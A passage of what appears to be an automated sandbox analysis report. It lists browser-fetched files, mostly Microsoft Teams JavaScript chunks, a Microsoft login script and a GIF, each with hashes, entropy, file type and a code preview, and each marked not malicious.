                                                                                                                                                                                                                                                                            SHA-512:E0E3662E5AC05FADF7F25D1639617B5DD31ECF5CD37142B81F64AF9FEC1B61BBCE1B3B911D2AD303E11BCB395325051D941814D2663D9764038552E2C8AF4281
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/712315-4d70afe314e618ce.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[712315],{805627:function(e,t,n){var o,r=this&&this.__extends||(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)t.hasOwnProperty(n)&&(e[n]=t[n])},function(e,t){function n(){this.constructor=e}o(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)});Object.defineProperty(t,"__esModule",{value:!0});var i,s=n(535817),a=n(337315),l=function(){function e(e){this._formatter=e||new c}return e.prototype.formatter=function(){return this._formatter},e.prototype.receiveAll=function(){return!1},e.prototype.levels=function(){return null},e}();function u(e){return(4294967296+e).toString(16).substr(-8)}function f(e,t){return(1e12+e).toString(10).substr(-t)}t.AbstractLogAppender=l,function(e){e[e.Timestamp=1]="Timestamp",e[e.Component=4]="Component",e[e.Level=8]="Level",e[e.FullDate=32]="FullDate",e[e.Lo
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):190440
                                                                                                                                                                                                                                                                            Entropy (8bit):4.954996696566872
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:csEkDwI5NFTL45cwYLfrbj52Dd0l2jQkNT5gpdLb96XXeEHtfwUzkSO1+KipnH+e:csGNIw+kX11ENcnqY2KvHz
                                                                                                                                                                                                                                                                            MD5:C4A892E39278CEDC5233BACF4DF8FCEB
                                                                                                                                                                                                                                                                            SHA1:E9E7C7155F52AB4332230745D37CF3F3C5045B5D
                                                                                                                                                                                                                                                                            SHA-256:25BC2604925CCF2C530E10ED660E52DDE558B59481780075B0CBFA2C47A48F59
                                                                                                                                                                                                                                                                            SHA-512:8D4857BB6F86EE53B9FD73C5B5D079F8983DAF490203AF559DA824F0A01EB2D4F82C509F3A28D182DC9586DDC9D801C0C50B062C546F28AEF6426A38B337DA98
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[704334],{704334:(e,t,a)=>{a.d(t,{NS:()=>n,L8:()=>i,gH:()=>o,hj:()=>r,pD:()=>l,Jk:()=>s,FX:()=>c,X0:()=>d,PX:()=>g,jQ:()=>v,YM:()=>S,_c:()=>f,Yf:()=>y,aQ:()=>I,Wy:()=>w,qd:()=>T,o8:()=>A,YL:()=>k,P2:()=>R,ln:()=>E,Vm:()=>P,lq:()=>D,LW:()=>M,PC:()=>F,hE:()=>L,N_:()=>U,nM:()=>O,T4:()=>N,HZ:()=>V,af:()=>B,Kp:()=>x,g5:()=>W,fp:()=>z,PR:()=>j,vm:()=>q,vd:()=>H,XL:()=>G,tY:()=>Q,cL:()=>J});var n,i,o,r,l,s,c,d,_=a(8435);!function(e){e.PREJOIN="prejoin",e.PLUGIN="plugin"}(n||(n={})),function(e){e.none="None",e.citrix="Citrix",e.vmware="VMware",e.avd="AVD",e.windows365="Windows365",e.citrixSlimCore="CitrixSlimCore",e.vmwareSlimCore="VMwareSlimCore",e.avdSlimCore="AVDSlimCore",e.windows365SlimCore="Windows365SlimCore",e.awsSlimCore="AWSSlimCore"}(i||(i={})),function(e){e.none="",e[e.wvd=43]="wvd",e[e.citrixXenDesktop=44]="citrixXenDesktop",e[e.citrixXenApp=44]="citrixXenApp",e[e.vmware=
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):160948
                                                                                                                                                                                                                                                                            Entropy (8bit):5.071433125556775
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:F9QCxgfp55cC4AQzZbQibIxUkHaVfNdkNEmmhDm:F9QZfpjcC4AQzZbQVraVfNdEEzDm
                                                                                                                                                                                                                                                                            MD5:37DF22CD4160A09C6A1DFF9EEA2D4889
                                                                                                                                                                                                                                                                            SHA1:820356DBD6D04AE45769478A02C9351E9450ACBD
                                                                                                                                                                                                                                                                            SHA-256:79E4C57BDCC297E7D28C1E3AFDD63DF5131E6C7BE1DA16AD10951D41E59ED9B1
                                                                                                                                                                                                                                                                            SHA-512:2FF73CFB22554586D29970AE9C1EAFC285AF5CDCFD3D8E2B4DDADD7BD671D52A527B26D64D7EA31C2AC1C2E1B8284664561021B153EFA7F25396ACABF925A5B1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[876152],{876152:e=>{e.exports=[{types:{ModelDirectiveScope:[5,["SERVER_RESOLVERS","BROWSER_RESOLVERS","CLIENT_RESOLVERS"]],DisplayWaterMark:[5,["On","Off","Fade"]],CommunityNotificationSettings:[2,{id:10,inviteOnNetworkEmailOptIn:2,announcementEmailOptIn:2}],HardwareOutDevice:[2,{id:10,description:6,isAvailable:7,callId:5,participantId:5,localStream:2,participantStreamId:3,videoType:"StreamType",format:1,formats:11,participantDisplayName:1}],PtzControlCommand:[5,["Reset","ZoomIn","ZoomOut","PanLeft","PanRight","TiltUp","TiltDown"]],TranscriptEditType:[5,["Speaker"]],TranscriptDownloadFormat:[5,["Vtt","Docx","Pdf"]],DriveRecipientInput:[6,{email:1,alias:1,objectId:1}],LinkScopeInput:[5,["anonymous","organization","users","existingAccess"]],LinkTypeInput:[5,["view","edit"]],CreateShareLinkOptions:[6,{deferRedeemEnabled:7,partialSuccessEnabled:7}],PptSharingContentInput:[6,{id:10,name:6,type
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5317)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):5425
                                                                                                                                                                                                                                                                            Entropy (8bit):4.510492774043985
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:W5jzKZX9doTTJgVyQHWrGc+6EsKrz5TQcy506rEGpQmFwgLm1XFwHM8+gIo4uIEi:iQ/iw5M1506rNIMpX+gvxrCT
                                                                                                                                                                                                                                                                            MD5:EB7D33F4299E9BF95AFF1CC7FD32D4F1
                                                                                                                                                                                                                                                                            SHA1:9A290ED2C80EE7F68E4E1A7A9EA4414FA97FEB03
                                                                                                                                                                                                                                                                            SHA-256:9B564293076EC3C532C8B1F744D93366B6E6FFBE75737597ED56F5725DD89E7F
                                                                                                                                                                                                                                                                            SHA-512:9A9ACC57568928710FC19A3E505DCBCFAAEFAEEDDFEE36AAB7E87600E43BF6062EB0125AB6747FDCBBEC65AE0D6D9DB1A3795C987882DCD98B3199C6277F2215
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[924039],{924039:(a,l,c)=>{c.d(l,{ZRL:()=>Z,TL0:()=>v,Co_:()=>e,Y$h:()=>A,xEh:()=>H,uGR:()=>M,A$C:()=>i,hs2:()=>V,tHQ:()=>m,pi9:()=>L,Dn5:()=>n});var h=c(693935);const Z=(0,h.U)("Vote20Filled","20",["M13.5 9h-1.27l1.73-3a1 1 0 0 0-.36-1.37L11 3.13a1 1 0 0 0-1.37.37l-2.5 4.33A1 1 0 0 0 7.26 9H6.5a.5.5 0 0 0 0 1h7a.5.5 0 0 0 0-1Zm-3-5 2.6 1.5L11.08 9H9.16L8 8.33 10.5 4Zm4.04 3-.58 1h.54l2.25 3H3.25L5.5 8h.4a1 1 0 0 1 .08-.17L6.46 7H5.5a1 1 0 0 0-.8.4l-2.5 3.33a1 1 0 0 0-.2.6V16a1 1 0 0 0 1 1h14a1 1 0 0 0 1-1v-4.67a1 1 0 0 0-.2-.6L15.3 7.4a1 1 0 0 0-.76-.4Z"]),v=(0,h.U)("Vote20Regular","20",["M12.23 9h1.27a.5.5 0 0 1 0 1h-7a.5.5 0 0 1 0-1h.76a1 1 0 0 1-.13-1.17l2.5-4.33A1 1 0 0 1 11 3.13l2.6 1.5A1 1 0 0 1 13.96 6l-1.73 3Zm.87-3.5L10.5 4 8 8.33 9.16 9h1.92l2.02-3.5Zm.86 2.5.58-1a1 1 0 0 1 .76.4l2.5 3.33a1 1 0 0 1 .2.6V16a1 1 0 0 1-1 1H3a1 1 0 0 1-1-1v-4.67a1 1 0 0 1 .2-.6L4.7 7.4a
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (35485)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):35593
                                                                                                                                                                                                                                                                            Entropy (8bit):5.433201153959229
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:BUd8hDG5Tf4TCvJIuyxof+JuJAXNh4ptwBKPQ7KcnwCVJp8FsnxMhRnA:KdgO0LXy+JuJAXNKp6BKPQJnwCRNxMha
                                                                                                                                                                                                                                                                            MD5:614CEF6A5591243EE327D5D2B7A2C698
                                                                                                                                                                                                                                                                            SHA1:A30288FE3D15BFEDC3E3B73B18A2ADA72BD43ABB
                                                                                                                                                                                                                                                                            SHA-256:8D81DC89757CB48425F7781F7FB889913FD959E96F977CA03F2BF19C571D9B72
                                                                                                                                                                                                                                                                            SHA-512:A37C171BE9894AA1EEA99374626498E734F9D3A632FEEB41E308D6D2142FBBB99CE48B101F29EA87FD7C736BC4300686371C755D56A828BCED9C5013B7CA0F1D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/972276-16a6accc1de1eb6a.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[972276],{296920:(e,t,n)=>{n.d(t,{e:()=>y,y:()=>I});var i=n(689054),r=n(305573);function s(e,t){for(var n,i=/\r\n|[\n\r]/g,r=1,s=t+1;(n=i.exec(e.body))&&n.index<t;)r+=1,s=t+1-(n.index+n[0].length);return{line:r,column:s}}function a(e){return o(e.source,s(e.source,e.start))}function o(e,t){var n=e.locationOffset.column-1,i=u(n)+e.body,r=t.line-1,s=e.locationOffset.line-1,a=t.line+s,o=1===t.line?n:0,l=t.column+o,p="".concat(e.name,":").concat(a,":").concat(l,"\n"),h=i.split(/\r\n|[\n\r]/g),f=h[r];if(f.length>120){for(var d=Math.floor(l/80),E=l%80,v=[],N=0;N<f.length;N+=80)v.push(f.slice(N,N+80));return p+c([["".concat(a),v[0]]].concat(v.slice(1,d+1).map((function(e){return["",e]})),[[" ",u(E-1)+"^"],["",v[d+1]]]))}return p+c([["".concat(a-1),h[r-1]],["".concat(a),f],["",u(l-1)+"^"],["".concat(a+1),h[r+1]]])}function c(e){var t=e.filter((function(e){e[0];return void 0!==e[1]})),n
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):3452
                                                                                                                                                                                                                                                                            Entropy (8bit):5.117912766689607
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                                                                                                                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                                                                                                                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                                                                                                                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                                                                                                                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://login.live.com/Me.htm?v=3
                                                                                                                                                                                                                                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (15751)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):15858
                                                                                                                                                                                                                                                                            Entropy (8bit):5.348387861845832
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:zHoM0U7A+ya03ytZ4JDZKK4rBAXjeJ8/L5bkp3eLQyV8Q:zHoM0U7A+yar4JD8KyBAXjeJcL1aeLQE
                                                                                                                                                                                                                                                                            MD5:3087871979030B3F8FFD6C1C8A7DD019
                                                                                                                                                                                                                                                                            SHA1:88CAE82471D1257F9B74C453A7076E2AB0D18321
                                                                                                                                                                                                                                                                            SHA-256:9E9CDCD584A8326B573EC923937919440FAFA020C5BDC1B954F8632F0184D85D
                                                                                                                                                                                                                                                                            SHA-512:714798C975E45D7F1E06357D242EEDEF5389004DC4716EA2A13D5E907232B6CF92393913DEEDFF02AF179D174BDBFA03B242C43B6AE0CF58086F60083465FEDC
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/78219-72fea9acaacd14dd.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[78219],{78219:(e,t,o)=>{o.d(t,{aQ:()=>b,yc:()=>E,Hm:()=>A,nF:()=>M,n:()=>I,OP:()=>w,Dk:()=>S,vh:()=>v,Y3:()=>x,qO:()=>U,Gd:()=>V,fw:()=>$,sE:()=>q,SQ:()=>N,wh:()=>R,ih:()=>F,EV:()=>G,dw:()=>P,fo:()=>H,aC:()=>z,g8:()=>W,H4:()=>K,ZH:()=>J,F9:()=>Q,Xz:()=>Z,$6:()=>Y,cO:()=>j,SS:()=>ee});var r=o(847431),a=o(625292),n=o(848020),i=o(802756),c=o(955262),s=o(923226),d=o(417694),u=o(406138),l=o(703478),p=o(935008),h=o(348773),y=o(161024),g=o(366603),m=o(211713),C=o(775251),f=o(299096),k=o(920506);const b=(e,t)=>{const{id:o,type:r,role:a,profile:n,subType:i,cloud:c,homeAccountId:s}=e,l=_(e),h=c!==l.cloud,y=d.Vh.getValue((0,u.Xr)((0,p.X_)(e)).telemetryInfo);t.setUserToTelemetryContext({id:o,type:r,role:a,oid:n?.oid,tid:n?.tid,subType:i,isCrossCloudUser:!!y?.isCrossCloudUser,isExternal:(0,p.ge)(o,s),userCloud:l.cloud,homeAccountId:h?l.cloud:l?.id,homeTenantId:h?l.cloud:l?.profile.tid})},
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):2672
                                                                                                                                                                                                                                                                            Entropy (8bit):6.640973516071413
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                                                                                                                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                                                                                                                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                                                                                                                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                                                                                                                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (20998)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):21106
                                                                                                                                                                                                                                                                            Entropy (8bit):5.452653021186707
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:+r9hEq1pKg0dQZ7dOz2DhXQlB897+p3vbBowdFd5zzyarBsFjNEFq8ve376BJxk/:+xiQpKy7Iz2SlB8cBKNEFg76SdcxrspN
                                                                                                                                                                                                                                                                            MD5:8582AC89D3364B0452D251B425FD485D
                                                                                                                                                                                                                                                                            SHA1:0CDB6C6B7D862E01C83C2F90CFD665A5A4CC8FAE
                                                                                                                                                                                                                                                                            SHA-256:DBD443E51C0082680B8DBB04C908596E11E27E8FB3A366CC4094F9EB40FE7990
                                                                                                                                                                                                                                                                            SHA-512:BA030EF2B0A5323B1EC4B2889F70163906504B478BB020FCE8AA877FEDD44C9483824EDB6D027A827A6CF4466818EB112831D767F13A8FA2D53CDEAFC21123F9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/797193-8730731cf6bc6c07.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[797193],{911777:(e,t,n)=>{n.d(t,{Z2:()=>a,Ov:()=>o,rc:()=>i});var a,s=n(364819);!function(e){e.GlobalApp="GlobalApp",e.TenantApp="TenantApp",e.CustomApp="CustomApp"}(a||(a={}));const o=e=>e?i(e.externalId,e.tenantId):null,i=(e,t)=>(0,s.isEmpty)(e)?a.GlobalApp:(0,s.isEmpty)(t)?a.CustomApp:a.TenantApp},235291:(e,t,n)=>{n.d(t,{tj:()=>x,B6:()=>A,eJ:()=>g,is:()=>b,xB:()=>L,MW:()=>F,w3:()=>C,T4:()=>T,eC:()=>y,K:()=>S,L$:()=>w});var a=n(364819),s=n(812228),o=n(362328),i=n(70887);const r={kind:"Document",get definitions(){const e=(0,o.G)("mutation pinMessageExtensionV2($appId:ID!,$pinOrder:Int!) {pinMessageExtensionV2(appId:$appId,pinOrder:$pinOrder) {...installedAppFields}}");return delete this.definitions,this.definitions=[...e.definitions,...i.B.definitions]}};var c=n(590438);const l={kind:"Document",get definitions(){const e=(0,o.G)("mutation unpinMessageExtensionV2($appId:ID!) {
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):106613
                                                                                                                                                                                                                                                                            Entropy (8bit):5.221372982138273
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:nG7SEq8Kx6NhjorZvVwb4HA7JNaKXI7MDn8kkeI:BKAtgXI7MDnPI
                                                                                                                                                                                                                                                                            MD5:D9554F14CE447CB79D1FA56607B0FB7D
                                                                                                                                                                                                                                                                            SHA1:FA6A51E1AC1C63F54F8424AAD4E1BE461F333715
                                                                                                                                                                                                                                                                            SHA-256:8F4BD8B14489FD5E54F94731ECAA774DEA700646823DCE51A45E378854573D77
                                                                                                                                                                                                                                                                            SHA-512:1FC84B0ED7683413ACE778F0E55BB3B98F70E1444BC440644F03A4852A0B9DDB015B26715EA0A7263892F0FD1923959EE6D7AEDE2B203FD675A86FFE76A8FC43
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[625778],{40478:(e,t,s)=>{s.d(t,{u:()=>r});var i=s(362328);const r={kind:"Document",get definitions(){const e=(0,i.G)("query userInviteLink {userInviteLink}");return delete this.definitions,this.definitions=e.definitions}}},52529:(e,t,s)=>{s.d(t,{L:()=>a,G:()=>n});var i=s(362328);const r={kind:"Document",get definitions(){const e=(0,i.G)("mutation addUpdateMostFrequentlyUsedContact($mfuContact:MfuContactInput!) {addUpdateMostFrequentlyUsedContact(mfuContact:$mfuContact) {id,alias}}");return delete this.definitions,this.definitions=e.definitions}},n=(e,t)=>{a(e,{alias:t})},a=(e,t)=>{e.mutate({mutation:r,variables:{mfuContact:t}})}},475637:(e,t,s)=>{s.d(t,{F:()=>r});var i=s(362328);const r={kind:"Document",get definitions(){const e=(0,i.G)("mutation ComponentsPeoplePickerInitSubstrateSearchMutation($scenarioName:String!,$convId:String) {initSubstrateSearch(scenarioName:$scenario
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):173803
                                                                                                                                                                                                                                                                            Entropy (8bit):5.435973488429615
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:VDWojvgYZEmp+zI9ozcpVuPZcBdtPXWmI+qoLSSd2tc:bjD1p+EWIEmWmzXd2S
                                                                                                                                                                                                                                                                            MD5:BB2D39B8A73F6A115B280A3496DCBE9D
                                                                                                                                                                                                                                                                            SHA1:A3D96508881DA6910FEFECDD7FAC9A8D799DB675
                                                                                                                                                                                                                                                                            SHA-256:E07497411ECC01872DEDD5409C25EEBAB3EB979322E5E00395F728F9E058FAAE
                                                                                                                                                                                                                                                                            SHA-512:E4D4BC86E8D46A1C9AD536E6606534D84F094073D793A94C48FA6016D15172343278CE9A1F5051023560EAF24A706DA12EC92C2D448F41AF1F18C5E119AE6AB2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/283032-49ed3292ba6ccaf2.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[283032],{635217:(e,t,n)=>{n.d(t,{H:()=>f,r:()=>y});var i=n(747885),r=n(187655),o=n(274085),a=n(364819);const s=(e,t,n)=>e&&0!==e.length?async i=>{if(!i)return{handled:!1,result:null};const r=t(i,e,n);let o;do{o=r.next(o&&o.value),o.value instanceof Promise&&(o.value=await o.value)}while(!o.done);const a=o;return{handled:a&&a.value&&a.value.handled,transientHandled:a&&a.value&&a.value.transientHandled,result:a&&a.value&&a.value.result}}:()=>Promise.resolve({handled:!1,result:null}),l=(e,t,n)=>c(e,t)&&(!e.findParent||!!n&&g(e.findParent,n)),c=(e,t)=>{if(t.type===i.L.ElementType.Text)return m(e.filter,"text");if(m(e.filter,t.name||"",void 0))return!0;for(const n of(0,a.keys)(t.attribs))if(m(e.filter,n)||m(e.filter,n,i.L.DomUtils.getAttributeValue(t,n)))return!0;return!1},d=(e,t,n)=>function*(i,r,o){let a,s=!1,c=i;for(const i of r){if(!c)break;if(!l(i,c,o))continue;let r=i.handle
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (31968)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):32342
                                                                                                                                                                                                                                                                            Entropy (8bit):5.796856592737622
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:qpWdBatM8ER62MFuDcdjxE91u85mbNScpv44rmjLoMCCfRz/6TBOgRZJCFE/b7NU:qcAxEIbMcpv44rK8MCCJz/6TBOgRZxU
                                                                                                                                                                                                                                                                            MD5:B863062969C157364657EF0513AD73DA
                                                                                                                                                                                                                                                                            SHA1:4A1D67AD41C1781C3816D242C0EE5EE0FE08CE18
                                                                                                                                                                                                                                                                            SHA-256:F246F2430B8EBE98376921AC4EECBF3389DC2664EA3F7C43185E604BC63875A4
                                                                                                                                                                                                                                                                            SHA-512:1A5D2693DADD3D04884BAC09948D97B327087BB12F8C6785EE9AC29E2C8D31C5B01FCF0FD50FB7F891343D92A2DF0ADCBE451ED7A723B39E3C5A52B13A93F78E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[79645],{461190:(e,t,s)=>{var n,i,o;s.d(t,{pG:()=>n,Ly:()=>i,Mv:()=>o}),function(e){e.ComposeMessage="composeMessage",e.PostCompose="postCompose",e.MessageList="messageList",e.Powerbar="powerbar",e.VirtualTreeList="virtualTreeList",e.FeedsFilter="feedsFilter",e.PeoplePicker="peoplePicker",e.SearchBox="searchBox",e.Floodgate="floodgate",e.ChatListSearchFilter="chatListSearchFilter",e.ChannelListSearchFilter="channelListSearchFilter",e.CallingPerf="callingPerf",e.TeamsAndChannelsTable="teamsAndChannelsTable",e.DiscoverSurfaceFeedList="discoverSurfaceFeedList",e.AllChannelSystemMessages="channelInfoPaneAllSystemMessages",e.AllPinnedPosts="channelInfoPaneAllPinnedPosts",e.UnifiedFunPicker="unifiedFunPicker",e.CreateTeamGallery="createTeamGallery",e.AddMember="addMember",e.MeetForWorkList="meetForWorkList",e.MeetForWorkSearchFilter="meetForWorkSearchFilter",e.PeopleAppContactList="
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5570)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):5678
                                                                                                                                                                                                                                                                            Entropy (8bit):5.412429152356154
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:N2y+zXTgXS4IvFM3pwRY4XCcO+Luj20gwceo1zf/ArJPawBXj/kb+DE:NgEi4ItM3pmEcOQuzx4f/AVXYKDE
                                                                                                                                                                                                                                                                            MD5:29ACBE811F209B39A435C7D0FF3CC186
                                                                                                                                                                                                                                                                            SHA1:541A19A018AA0D425A4958054BD5EC6B66749E60
                                                                                                                                                                                                                                                                            SHA-256:BB44554D718C31BA72F43929903CE73E8093406C59658C00EFE2F80F70D498E0
